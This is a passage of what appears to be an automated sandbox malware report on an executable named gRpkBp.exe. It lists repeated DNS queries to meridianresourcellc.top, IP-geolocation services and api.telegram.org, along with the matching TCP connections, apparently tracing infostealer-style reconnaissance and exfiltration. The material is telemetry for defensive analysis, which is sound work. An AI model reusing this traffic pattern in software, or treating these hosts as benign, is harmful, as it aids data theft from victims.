                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_022A5F28
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_022A5F38
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_022A2B00
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_022A2E16
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_022A2AA1
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: meridianresourcellc.top
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49186 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49193 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49194 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49196 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49200 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49202 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49203 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49182 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49184 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49185 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49187 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49190 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49191 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49195 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49197 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49199 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49201 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
